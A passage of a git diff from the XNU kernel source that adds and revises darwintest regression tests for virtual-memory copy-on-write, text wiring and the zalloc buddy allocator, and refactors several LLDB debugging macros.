+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("mem_entry(): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       /* check that region is no longer nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       if (before != after) {
+               if (depth == 0) {
+                       T_PASS("mem_entry() honored copy-on-write");
+               } else {
+                       T_FAIL("mem_entry() did not trigger copy-on_write");
+               }
+       } else {
+               T_FAIL("mem_entry() did not honor copy-on-write");
+       }
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_EQ(depth, 0, "no longer nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable");
+       T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+       mach_port_deallocate(mach_task_self(), mem_entry);
+}
+
 T_DECL(copyoverwrite_submap_protection, "test copywrite vm region submap \
     protection", T_META_ALL_VALID_ARCHS(true))
 {
@@ -1029,14 +1701,14 @@ T_DECL(wire_text, "test wired text for rdar://problem/16783546 Wiring code in \
     the shared region triggers code-signing violations",
     T_META_ALL_VALID_ARCHS(true))
 {
-       char *addr;
+       uint32_t *addr, before, after;
        int retval;
        int saved_errno;
        kern_return_t kr;
        vm_address_t map_addr, remap_addr;
        vm_prot_t curprot, maxprot;
 
-       addr = (char *)&printf;
+       addr = (uint32_t *)&printf;
 #if __has_feature(ptrauth_calls)
        map_addr = (vm_address_t)(uintptr_t)ptrauth_strip(addr, ptrauth_key_function_pointer);
 #else /* __has_feature(ptrauth_calls) */
@@ -1052,31 +1724,43 @@ T_DECL(wire_text, "test wired text for rdar://problem/16783546 Wiring code in \
            VM_INHERIT_DEFAULT);
        T_ASSERT_EQ(kr, KERN_SUCCESS, "vm_remap error 0x%x (%s)",
            kr, mach_error_string(kr));
+       before = *addr;
        retval = mlock(addr, 4096);
+       after = *addr;
        if (retval != 0) {
                saved_errno = errno;
                T_ASSERT_EQ(saved_errno, EACCES, "wire shared text error %d (%s), expected: %d",
                    saved_errno, strerror(saved_errno), EACCES);
+       } else if (after != before) {
+               T_ASSERT_FAIL("shared text changed by wiring at %p 0x%x -> 0x%x", addr, before, after);
        } else {
                T_PASS("wire shared text");
        }
 
-       addr = (char *) &fprintf;
+       addr = (uint32_t *) &fprintf;
+       before = *addr;
        retval = mlock(addr, 4096);
+       after = *addr;
        if (retval != 0) {
                saved_errno = errno;
                T_ASSERT_EQ(saved_errno, EACCES, "wire shared text error %d (%s), expected: %d",
                    saved_errno, strerror(saved_errno), EACCES);
+       } else if (after != before) {
+               T_ASSERT_FAIL("shared text changed by wiring at %p 0x%x -> 0x%x", addr, before, after);
        } else {
                T_PASS("wire shared text");
        }
 
-       addr = (char *) &testmain_wire_text;
+       addr = (uint32_t *) &testmain_wire_text;
+       before = *addr;
        retval = mlock(addr, 4096);
+       after = *addr;
        if (retval != 0) {
                saved_errno = errno;
                T_ASSERT_EQ(saved_errno, EACCES, "wire text error return error %d (%s)",
                    saved_errno, strerror(saved_errno));
+       } else if (after != before) {
+               T_ASSERT_FAIL("text changed by wiring at %p 0x%x -> 0x%x", addr, before, after);
        } else {
                T_PASS("wire text");
        }
diff --git a/tests/xnu_quick_test.entitlements b/tests/xnu_quick_test.entitlements
deleted file mode 100644 (file)
index ada01fb..0000000
+++ /dev/null
@@ -1,8 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.rootless.datavault.controller.internal</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/xnu_quick_test_entitled.c b/tests/xnu_quick_test_entitled.c
deleted file mode 100644 (file)
index 24c96e4..0000000
+++ /dev/null
@@ -1,85 +0,0 @@
-#include <darwintest.h>
-
-#include <fcntl.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <sys/types.h>
-#include <sys/sysctl.h>
-#include <sys/disk.h>
-#include <sys/ioctl.h>
-#include <sys/mount.h>
-
-#if !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
-#include <sys/csr.h>
-#endif
-
-T_GLOBAL_META(
-       T_META_NAMESPACE("xnu.quicktest"),
-       T_META_CHECK_LEAKS(false),
-       T_META_RUN_CONCURRENTLY(true)
-       );
-
-
-/*  **************************************************************************************************************
- *     Test ioctl system calls.
- *  **************************************************************************************************************
- */
-T_DECL(ioctl, "Sanity check of ioctl by exercising DKIOCGETBLOCKCOUNT and DKIOCGETBLOCKSIZE",
-    T_META_ASROOT(true))
-{
-       int                                     my_err;
-       int                                     my_fd = -1;
-       struct statfs *         my_infop;
-       char *                          my_ptr;
-       int                                     my_blksize;
-       long long                       my_block_count;
-       char                            my_name[MAXPATHLEN];
-
-#if !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
-       /*
-        * this test won't be able to open the root disk device unless CSR is
-        * disabled or in AppleInternal mode
-        */
-       if (csr_check( CSR_ALLOW_UNRESTRICTED_FS ) &&
-           csr_check( CSR_ALLOW_APPLE_INTERNAL )) {
-               T_SKIP("System Integrity Protection is enabled");
-       }
-#endif
-
-       T_SETUPBEGIN;
-
-       T_WITH_ERRNO;
-       T_ASSERT_GT(getmntinfo( &my_infop, MNT_NOWAIT ), 0, "getmntinfo");
-
-       /* make this a raw device */
-       strlcpy( &my_name[0], &my_infop->f_mntfromname[0], sizeof(my_name));
-       if ((my_ptr = strrchr( &my_name[0], '/' )) != 0) {
-               if (my_ptr[1] != 'r') {
-                       my_ptr[strlen( my_ptr )] = 0x00;
-                       memmove( &my_ptr[2], &my_ptr[1], (strlen( &my_ptr[1] ) + 1));
-                       my_ptr[1] = 'r';
-               }
-       }
-
-       T_ASSERT_POSIX_SUCCESS(my_fd = open( &my_name[0], O_RDONLY ), "open");
-
-       T_SETUPEND;
-
-       /* obtain the size of the media (in blocks) */
-       T_EXPECT_POSIX_SUCCESS(my_err = ioctl( my_fd, DKIOCGETBLOCKCOUNT, &my_block_count ),
-           "ioctl DKIOCGETBLOCKCOUNT");
-
-       /* obtain the block size of the media */
-       T_EXPECT_POSIX_SUCCESS(my_err = ioctl( my_fd, DKIOCGETBLOCKSIZE, &my_blksize ),
-           "ioctl DKIOCGETBLOCKSIZE");
-
-       T_LOG( "my_block_count %qd my_blksize %d \n", my_block_count, my_blksize );
-
-       if (my_err != -1) {
-               /* make sure the returned data looks somewhat valid */
-               T_EXPECT_GE(my_blksize, 0, NULL);
-               T_EXPECT_LE(my_blksize, 1024 * 1000, NULL);
-       }
-
-       close( my_fd );
-}
diff --git a/tests/zalloc_buddy.c b/tests/zalloc_buddy.c
new file mode 100644 (file)
index 0000000..76ed259
--- /dev/null
@@ -0,0 +1,131 @@
+#include <darwintest.h>
+#include <darwintest_utils.h>
+
+#include <mach/mach.h>
+#include <sys/mman.h>
+
+#undef __abortlike
+#define __abortlike
+#define panic(fmt, ...) ({ T_FAIL(fmt, __VA_ARGS__); abort(); })
+
+#define __security_const_late
+#define ZALLOC_TEST 1
+#include "../osfmk/kern/zalloc.c"
+
+#define ZBA_TEST_SIZE  (1ul << 20)
+
+static void
+zba_populate_any(vm_address_t addr, vm_size_t size)
+{
+       int rc = mprotect((void *)addr, size, PROT_READ | PROT_WRITE);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rc, "mprotect");
+}
+
+static void
+zba_populate_nope(vm_address_t addr, vm_size_t size)
+{
+#pragma unused(addr, size)
+       T_FAIL("Trying to extend the storage");
+       T_END;
+}
+
+static void
+zba_test_allow_extension(void)
+{
+       zba_test_info.zbats_populate = zba_populate_any;
+}
+
+static void
+zba_test_disallow_extension(void)
+{
+       zba_test_info.zbats_populate = zba_populate_nope;
+}
+
+static void
+zba_test_setup(void)
+{
+       kern_return_t kr;
+       int rc;
+
+       kr = vm_allocate(mach_task_self(), &zba_test_info.zbats_base,
+           ZBA_TEST_SIZE + ZBA_CHUNK_SIZE, VM_FLAGS_ANYWHERE);
+       T_ASSERT_MACH_SUCCESS(kr, "vm_allocate()");
+
+       zba_test_info.zbats_base = roundup(zba_test_info.zbats_base,
+           ZBA_CHUNK_SIZE);
+
+       rc = mprotect(zba_base_header(), ZBA_TEST_SIZE, PROT_NONE);
+       T_ASSERT_POSIX_SUCCESS(rc, "mprotect");
+
+       T_LOG("SETUP allocator with base at %p", zba_base_header());
+
+       zba_test_allow_extension();
+       zba_populate(0);
+       zba_init_chunk(0);
+}
+
+T_DECL(zone_buddy_allocator_encodings, "test the buddy allocator formulas")
+{
+       uint8_t bits[sizeof(zba_base_header()->zbah_bits)] = { };
+
+       for (uint32_t o = ZBA_MAX_ORDER + 1; o-- > 0;) {
+               for (vm_address_t pos = 0; pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE << o) {
+                       struct zone_bits_chain *zbc;
+                       size_t node = zba_node(pos, o);
+
+                       zbc = zba_chain_for_node(NULL, node, o);
+                       T_QUIET; T_ASSERT_EQ(pos, (vm_offset_t)zbc,
+                           "zba_node / zba_chain_for_node is reversible (pos: %lx, node %zd)",
+                           pos, node);
+
+
+                       if (o == 0) {
+                               // leaf nodes aren't represented in the bitmap
+                               continue;
+                       }
+                       T_QUIET; T_ASSERT_LT(node, 8 * sizeof(bits), "fits in bitfield: %zd", pos);
+                       T_QUIET; T_ASSERT_EQ(0, bits[node / 8] & (1 << (node % 8)), "never seen");
+                       bits[node / 8] ^= 1 << (node % 8);
+               }
+       }
+
+       T_PASS("zba_node, zba_chain_for_node look sane");
+}
+
+T_DECL(zone_buddy_allocator, "test the zone bits setup")
+{
+       vm_address_t base, pos;
+
+       zba_test_setup();
+
+       zba_test_disallow_extension();
+
+       base = (vm_address_t)zba_slot_base();
+       for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc");
+               *(uint64_t *)(base + pos) = ~0ull;
+       }
+       for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               zba_free(base + pos, 0);
+       }
+
+       for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc");
+               *(uint64_t *)(base + pos) = ~0ull;
+       }
+       zba_test_allow_extension();
+
+       base += ZBA_CHUNK_SIZE;
+       for (pos = zba_chunk_header_size(1); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc");
+               *(uint64_t *)(base + pos) = ~0ull;
+       }
+
+       for (pos = zba_chunk_header_size(1); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               zba_free(base + pos, 0);
+       }
+       base -= ZBA_CHUNK_SIZE;
+       for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               zba_free(base + pos, 0);
+       }
+}
index f00ff970a707e8f4ac248df8456c5036df5043c6..f20f231da16cce0c7642a1765c3950bdf189439c 100644 (file)
@@ -79,7 +79,8 @@ LLDBMACROS_PYTHON_FILES = $(LLDBMACROS_USERDEBUG_FILES) \
        pgtrace.py \
        xnutriage.py \
        zonetriage.py \
-       sysreg.py
+       sysreg.py \
+       counter.py
 
 ifneq ($(PLATFORM),MacOSX)
        LLDBMACROS_PYTHON_FILES+= \
index d21b5c91269aaaf7553587b29e945963065af23f..0168046c9b7f2521865ee3f8e3772ef4a4346003 100755 (executable)
@@ -314,6 +314,7 @@ class KernelTarget(object):
         self._thread_groups = []
         self._allproc = []
         self._terminated_tasks_list = []
+        self._terminated_threads_list = []
         self._zones_list = []
         self._zombproc_list = []
         self._kernel_types_cache = {} #this will cache the Type objects as and when requested.
@@ -591,6 +592,17 @@ class KernelTarget(object):
             caching.SaveDynamicCacheData("kern._terminated_tasks_list", self._terminated_tasks_list)
             return self._terminated_tasks_list
 
+        if name == 'terminated_threads' :
+            self._terminated_threads_list = caching.GetDynamicCacheData("kern._terminated_threads_list", [])
+            if len(self._terminated_threads_list) > 0 : return self._terminated_threads_list
+            thread_queue_head = self.GetGlobalVariable('terminated_threads')
+            thread_type = LazyTarget.GetTarget().FindFirstType('thread')
+            thread_ptr_type = thread_type.GetPointerType()
+            for trd in IterateQueue(thread_queue_head, thread_ptr_type, 'threads'):
+                self._terminated_threads_list.append(trd)
+            caching.SaveDynamicCacheData("kern._terminated_threads_list", self._terminated_threads_list)
+            return self._terminated_threads_list
+
         if name == 'procs' :
             self._allproc = caching.GetDynamicCacheData("kern._allproc", [])
             if len(self._allproc) > 0 : return self._allproc
index 02ec68eb5762ad27060f13559a3488e50702dd4e..916f66a07209616fe968960d200b1c79987297bb 100755 (executable)
@@ -15,6 +15,11 @@ import re
 
 tabs_search_rex = re.compile("^\s*\t+",re.MULTILINE|re.DOTALL)
 
+def find_non_ascii(s):
+    for c in s:
+        if ord(c) >= 0x80: return True
+    return False
+
 if __name__ == "__main__":
     if len(sys.argv) < 2:
         print >>sys.stderr, "Error: Unknown arguments"
@@ -30,13 +35,16 @@ if __name__ == "__main__":
         fh = open(fname)
         strdata = fh.readlines()
         lineno = 0
-        tab_check_status = True
+        syntax_fail = False
         for linedata in strdata:
             lineno += 1
             if len(tabs_search_rex.findall(linedata)) > 0 :
                 print >>sys.stderr, "Error: Found a TAB character at %s:%d" % (fname, lineno)
-                tab_check_status = False
-        if tab_check_status == False:
+                syntax_fail = True
+           if find_non_ascii(linedata):
+                print >>sys.stderr, "Error: Found a non ascii character at %s:%d" % (fname, lineno)
+                syntax_fail = True
+        if syntax_fail:
             print >>sys.stderr, "Error: Syntax check failed. Please fix the errors and try again."
             sys.exit(1)
         #now check for error in compilation
diff --git a/tools/lldbmacros/counter.py b/tools/lldbmacros/counter.py
new file mode 100755 (executable)
index 0000000..200c337
--- /dev/null
@@ -0,0 +1,24 @@
+from memory import IterateZPerCPU
+from xnu import *
+
+@lldb_type_summary(['scalable_counter_t'])
+@header("Counter Value\n-------------")
+def GetSimpleCounter(counter):
+    """ Prints out the value of a percpu counter
+        params: counter: value - value object representing counter
+        returns: str - THe value of the counter as a string.
+    """
+    val = 0
+    for v in IterateZPerCPU(counter, "uint64_t *"):
+        val += dereference(v)
+    return str(val)
+
+@lldb_command('showcounter')
+def ShowSimpleCounter(cmd_args=None):
+    """ Show the value of a percpu counter.
+        Usage: showcounter <address of counter>
+    """
+    if not cmd_args:
+        raise ArgumentError("Please specify the address of the counter you want to read.")
+        return
+    print GetSimpleCounter(kern.GetValueFromAddress(cmd_args[0], "scalable_counter_t"))
index 4ae6086e61a84e68696c6274be9823e4aba07c83..7f7c65163419be8510b2efc4f3f65a787bca4361 100755 (executable)
@@ -1242,14 +1242,14 @@ def IterateAllPorts(tasklist, func, ctx, include_psets, follow_busyports, should
             func(t, space, ctx, taskports_idx, 0, t.itk_debug_control, 17)
         if unsigned(t.itk_task_access) > 0:
             func(t, space, ctx, taskports_idx, 0, t.itk_task_access, 17)
-        if unsigned(t.itk_self[1]) > 0: ## task read port
-            func(t, space, ctx, taskports_idx, 0, t.itk_self[1], 17)
-        if unsigned(t.itk_self[2]) > 0: ## task inspect port
-            func(t, space, ctx, taskports_idx, 0, t.itk_self[2], 17)
+        if unsigned(t.itk_task_ports[1]) > 0: ## task read port
+            func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[1], 17)
+        if unsigned(t.itk_task_ports[2]) > 0: ## task inspect port
+            func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[2], 17)
 
         ## Task name port (not a send right, just a naked ref); TASK_FLAVOR_NAME = 3
-        if unsigned(t.itk_self[3]) > 0:
-            func(t, space, ctx, taskports_idx, 0, t.itk_self[3], 0)
+        if unsigned(t.itk_task_ports[3]) > 0:
+            func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[3], 0)
 
         ## task resume port is a receive right to resume the task
         if unsigned(t.itk_resume) > 0:
index 94f133ccda751fc0e9f0b7e5c243a36b51af8769..7a95127e4fe5eda9d9ffb2e85434eb07b112ca66 100755 (executable)
@@ -82,7 +82,7 @@ def print_alloc_free_entry(addr, orig_ptr):
             leftrz = 16
         else:
             alloc_type = "zone"
-            leftrz = unsigned(zone.kasan_redzone)
+            leftrz = unsigned(zone.z_kasan_redzone)
     else:
         alloc_type = "kalloc"
         if asz - usz >= 2*pgsz:
index a17eec8b23bb0d82e88e52845b25c6fdacf35bb3..08aa8dbcb79ca92920d9d56a765b95661fa540df 100755 (executable)
@@ -16,6 +16,10 @@ import contextlib
 import base64
 import zlib
 
+# can be removed once we move to Python3.1+
+from future.utils.surrogateescape import register_surrogateescape
+register_surrogateescape()
+
 class Globals(object):
     pass
 G = Globals()
@@ -165,6 +169,13 @@ KNOWN_TOPLEVEL_CONTAINER_TYPES = ()
 def enum(**args):
     return type('enum', (), args)
 
+#
+# Decode bytes as UTF-8, using surrogateescape if there are invalid UTF-8
+# sequences; see PEP-383
+#
+def BytesToString(b):
+    return b.decode('utf-8', errors="surrogateescape")
+
 KCSUBTYPE_TYPE = enum(KC_ST_CHAR=1, KC_ST_INT8=2, KC_ST_UINT8=3, KC_ST_INT16=4, KC_ST_UINT16=5, KC_ST_INT32=6, KC_ST_UINT32=7, KC_ST_INT64=8, KC_ST_UINT64=9)
 
 
@@ -210,7 +221,7 @@ class KCSubTypeElement(object):
     @staticmethod
     def FromBinaryTypeData(byte_data):
         (st_flag, st_type, st_offset, st_size, st_name) = struct.unpack_from('=BBHI32s', byte_data)
-        st_name = st_name.rstrip('\x00')
+        st_name = BytesToString(st_name.rstrip('\0'))
         return KCSubTypeElement(st_name, st_type, st_size, st_offset, st_flag)
 
     @staticmethod
@@ -238,7 +249,10 @@ class KCSubTypeElement(object):
         return self.totalsize
 
     def GetValueAsString(self, base_data, array_pos=0):
-        return str(self.GetValue(base_data, array_pos))
+        v = self.GetValue(base_data, array_pos)
+        if isinstance(v, bytes):
+            return BytesToString(v)
+        return str(v)
 
     def GetValue(self, base_data, array_pos=0):
         return struct.unpack_from(self.unpack_fmt, base_data[self.offset + (array_pos * self.size):])[0]
@@ -499,14 +513,14 @@ class KCObject(object):
         elif self.i_type == GetTypeForName('KCDATA_TYPE_UINT32_DESC'):
             self.is_naked_type = True
             u_d = struct.unpack_from('32sI', self.i_data)
-            self.i_name = u_d[0].strip(chr(0))
+            self.i_name = BytesToString(u_d[0].rstrip('\0'))
             self.obj = u_d[1]
             logging.info("0x%08x: %s%s" % (self.offset, INDENT(), self.i_name))
 
         elif self.i_type == GetTypeForName('KCDATA_TYPE_UINT64_DESC'):
             self.is_naked_type = True
             u_d = struct.unpack_from('32sQ', self.i_data)
-            self.i_name = u_d[0].strip(chr(0))
+            self.i_name = BytesToString(u_d[0].rstrip('\0'))
             self.obj = u_d[1]
             logging.info("0x%08x: %s%s" % (self.offset, INDENT(), self.i_name))
 
@@ -944,6 +958,7 @@ KNOWN_TYPES_COLLECTION[GetTypeForName('STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO')]
     KCSubTypeElement('imageLoadAddress', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 0, 0),
     KCSubTypeElement('imageUUID', KCSUBTYPE_TYPE.KC_ST_UINT8, KCSubTypeElement.GetSizeForArray(16, 1), 8, 1),
     KCSubTypeElement('imageSlidBaseAddress', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 24, 0),
+    KCSubTypeElement('sharedCacheSlidFirstMapping', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 32, 0),
 ),
     'shared_cache_dyld_load_info',
     legacy_size = 0x18
@@ -1238,6 +1253,7 @@ KNOWN_TYPES_COLLECTION[GetTypeForName('STACKSHOT_KCTYPE_STACKSHOT_DURATION')] =
     (
         KCSubTypeElement.FromBasicCtype('stackshot_duration', KCSUBTYPE_TYPE.KC_ST_UINT64, 0),
         KCSubTypeElement.FromBasicCtype('stackshot_duration_outer', KCSUBTYPE_TYPE.KC_ST_UINT64, 8),
+        KCSubTypeElement.FromBasicCtype('stackshot_duration_prior', KCSUBTYPE_TYPE.KC_ST_UINT64, 16),
     ), 'stackshot_duration', merge=True
 )
 
@@ -1759,30 +1775,6 @@ def RunCommand(bash_cmd_string, get_stderr = True):
         return (exit_code, output_str)
 
 
-parser = argparse.ArgumentParser(description="Decode a kcdata binary file.")
-parser.add_argument("-l", "--listtypes", action="store_true", required=False, default=False,
-                    help="List all known types",
-                    dest="list_known_types")
-
-parser.add_argument("-s", "--stackshot", required=False, default=False,
-                    help="Generate a stackshot report file",
-                    dest="stackshot_file")
-
-parser.add_argument("--multiple", help="look for multiple stackshots in a single file", action='store_true')
-
-parser.add_argument("-p", "--plist", required=False, default=False,
-                    help="output as plist", action="store_true")
-
-parser.add_argument("-S", "--sdk", required=False, default="", help="sdk property passed to xcrun command to find the required tools. Default is empty string.", dest="sdk")
-parser.add_argument("--pretty", default=False, action='store_true', help="make the output a little more human readable")
-parser.add_argument("--incomplete", action='store_true', help="accept incomplete data")
-parser.add_argument("kcdata_file", type=argparse.FileType('r'), help="Path to a kcdata binary file.")
-
-class VerboseAction(argparse.Action):
-    def __call__(self, parser, namespace, values, option_string=None):
-        logging.basicConfig(level=logging.INFO, stream=sys.stderr, format='%(message)s')
-parser.add_argument('-v', "--verbose", action=VerboseAction, nargs=0)
-
 @contextlib.contextmanager
 def data_from_stream(stream):
     try:
@@ -1858,7 +1850,7 @@ def prettify(data):
                 value = '%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X' % tuple(value)
             elif 'address' in key.lower() and isinstance(value, (int, long)):
                 value = '0x%X' % value
-            elif key == 'lr':
+            elif key == 'lr' or key == 'sharedCacheSlidFirstMapping':
                 value = '0x%X' % value
             elif key == 'thread_waitinfo':
                 value = map(formatWaitInfo, value)
@@ -1876,6 +1868,30 @@ def prettify(data):
 
 
 if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description="Decode a kcdata binary file.")
+    parser.add_argument("-l", "--listtypes", action="store_true", required=False, default=False,
+                        help="List all known types",
+                        dest="list_known_types")
+
+    parser.add_argument("-s", "--stackshot", required=False, default=False,
+                        help="Generate a stackshot report file",
+                        dest="stackshot_file")
+
+    parser.add_argument("--multiple", help="look for multiple stackshots in a single file", action='store_true')
+
+    parser.add_argument("-p", "--plist", required=False, default=False,
+                        help="output as plist", action="store_true")
+
+    parser.add_argument("-S", "--sdk", required=False, default="", help="sdk property passed to xcrun command to find the required tools. Default is empty string.", dest="sdk")
+    parser.add_argument("--pretty", default=False, action='store_true', help="make the output a little more human readable")
+    parser.add_argument("--incomplete", action='store_true', help="accept incomplete data")
+    parser.add_argument("kcdata_file", type=argparse.FileType('r'), help="Path to a kcdata binary file.")
+
+    class VerboseAction(argparse.Action):
+        def __call__(self, parser, namespace, values, option_string=None):
+            logging.basicConfig(level=logging.INFO, stream=sys.stderr, format='%(message)s')
+    parser.add_argument('-v', "--verbose", action=VerboseAction, nargs=0)
+
     args = parser.parse_args()
 
     if args.multiple and args.stackshot_file:
index 80360f65079043c97219fcf9ac3b4d4ab43cf93a..10848f494769f67ed505da21d34a8f353e052120 100755 (executable)
@@ -2,7 +2,9 @@ from xnu import *
 from utils import *
 from core.lazytarget import *
 from misc import *
+from kcdata import kcdata_item_iterator, KCObject, GetTypeForName, KCCompressedBufferObject
 from collections import namedtuple
+import heapq
 
 # From the defines in bsd/sys/kdebug.h:
 
@@ -261,100 +263,118 @@ def ShowKtrace(cmd_args=None):
     print GetKperfStatus()
 
 
-class KDCPU(object):
-    def __init__(self, store, curidx):
-        self.store = store
-        self.curidx = curidx
-        self.oldest_time = None
+class KDEvent(object):
+    """
+    Wrapper around kevent pointer that handles sorting logic.
+    """
+    def __init__(self, timestamp, kevent):
+        self.kevent = kevent
+        self.timestamp = timestamp
 
+    def get_kevent(self):
+        return self.kevent
 
-def IterateKdebugEvents():
+    def __eq__(self, other):
+        return self.timestamp == other.timestamp
+
+    def __lt__(self, other):
+        return self.timestamp < other.timestamp
+
+    def __gt__(self, other):
+        return self.timestamp > other.timestamp
+
+
+class KDCPU(object):
     """
-    Yield events from the in-memory kdebug trace buffers.
+    Represents all events from a single CPU.
     """
-    ctrl = kern.globals.kd_ctrl_page
+    def __init__(self, cpuid):
+        self.cpuid = cpuid
+        self.iter_store = None
+
+        kdstoreinfo = kern.globals.kdbip[cpuid]
+        self.kdstorep = kdstoreinfo.kd_list_head
+
+        if self.kdstorep.raw == xnudefines.KDS_PTR_NULL:
+            # Returns an empty iterrator. It will immediatelly stop at
+            # first call to __next__().
+            return
 
-    def get_kdstore(kdstorep):
+        self.iter_store = self.get_kdstore(self.kdstorep)
+
+        # XXX Doesn't have the same logic to avoid un-mergeable events
+        #     (respecting barrier_min and bufindx) as the C code.
+
+        self.iter_idx = self.iter_store.kds_readlast
+
+    def get_kdstore(self, kdstorep):
         """
         See POINTER_FROM_KDSPTR.
         """
         buf = kern.globals.kd_bufs[kdstorep.buffer_index]
         return addressof(buf.kdsb_addr[kdstorep.offset])
 
-    def get_kdbuf_timestamp(kdbuf):
-        time_cpu = kdbuf.timestamp
-        return unsigned(time_cpu)
+    # Event iterator implementation returns KDEvent instance
 
-    if (ctrl.kdebug_flags & xnudefines.KDBG_BFINIT) == 0:
-        return
+    def __iter__(self):
+        return self
 
-    barrier_min = ctrl.oldest_time
+    def __next__(self):
+        # This CPU is out of events
+        if self.iter_store is None:
+            raise StopIteration
 
-    if (ctrl.kdebug_flags & xnudefines.KDBG_WRAPPED) != 0:
-        # TODO Yield a wrap event with the barrier_min timestamp.
-        pass
+        if self.iter_idx == self.iter_store.kds_bufindx:
+            self.iter_store = None
+            raise StopIteration
 
-    # Set up CPU state for merging events.
-    ncpus = ctrl.kdebug_cpus
-    cpus = []
-    for cpu in range(ncpus):
-        kdstoreinfo = kern.globals.kdbip[cpu]
-        storep = kdstoreinfo.kd_list_head
-        store = None
-        curidx = 0
-        if storep.raw != xnudefines.KDS_PTR_NULL:
-            store = get_kdstore(storep)
-            curidx = store.kds_readlast
-        # XXX Doesn't have the same logic to avoid un-mergeable events
-        #     (respecting barrier_min and bufindx) as the C code.
+        keventp = addressof(self.iter_store.kds_records[self.iter_idx])
+        timestamp = unsigned(keventp.timestamp)
 
-        cpus.append(KDCPU(store, curidx))
+        # check for writer overrun
+        if timestamp < self.iter_store.kds_timestamp:
+            raise StopIteration
 
-    while True:
-        earliest_time = 0xffffffffffffffff
-        min_cpu = None
-        for cpu in cpus:
-            if not cpu.store:
-                continue
+        # Advance iterator
+        self.iter_idx += 1
 
-            # Check for overrunning the writer, which also indicates the CPU is
-            # out of events.
-            if cpu.oldest_time:
-                timestamp = cpu.oldest_time
+        if self.iter_idx == xnudefines.EVENTS_PER_STORAGE_UNIT:
+            snext = self.iter_store.kds_next
+            if snext.raw == xnudefines.KDS_PTR_NULL:
+                # Terminate iteration in next loop. Current element is the
+                # last one in this CPU buffer.
+                self.iter_store = None
             else:
-                timestamp = get_kdbuf_timestamp(
-                        addressof(cpu.store.kds_records[cpu.curidx]))
-                cpu.oldest_time = timestamp
+                self.iter_store = self.get_kdstore(snext)
+                self.iter_idx = self.iter_store.kds_readlast
 
-            if timestamp < cpu.store.kds_timestamp:
-                cpu.store = None
-                continue
+        return KDEvent(timestamp, keventp)
 
-            if timestamp < earliest_time:
-                earliest_time = timestamp
-                min_cpu = cpu
+    # Python 2 compatibility
+    def next(self):
+        return self.__next__()
 
-        # Out of events.
-        if not min_cpu:
-            return
 
-        yield min_cpu.store.kds_records[min_cpu.curidx]
-        min_cpu.oldest_time = None
+def IterateKdebugEvents():
+    """
+    Yield events from the in-memory kdebug trace buffers.
+    """
+    ctrl = kern.globals.kd_ctrl_page
 
-        min_cpu.curidx += 1
-        if min_cpu.curidx == xnudefines.EVENTS_PER_STORAGE_UNIT:
-            next = min_cpu.store.kds_next
-            if next.raw == xnudefines.KDS_PTR_NULL:
-                min_cpu.store = None
-                min_cpu.curidx = None
-            else:
-                min_cpu.store = get_kdstore(next)
-                min_cpu.curidx = min_cpu.store.kds_readlast
+    if (ctrl.kdebug_flags & xnudefines.KDBG_BFINIT) == 0:
+        return
+
+    barrier_min = ctrl.oldest_time
 
-        # This CPU is out of events.
-        if min_cpu.curidx == min_cpu.store.kds_bufindx:
-            min_cpu.store = None
-            continue
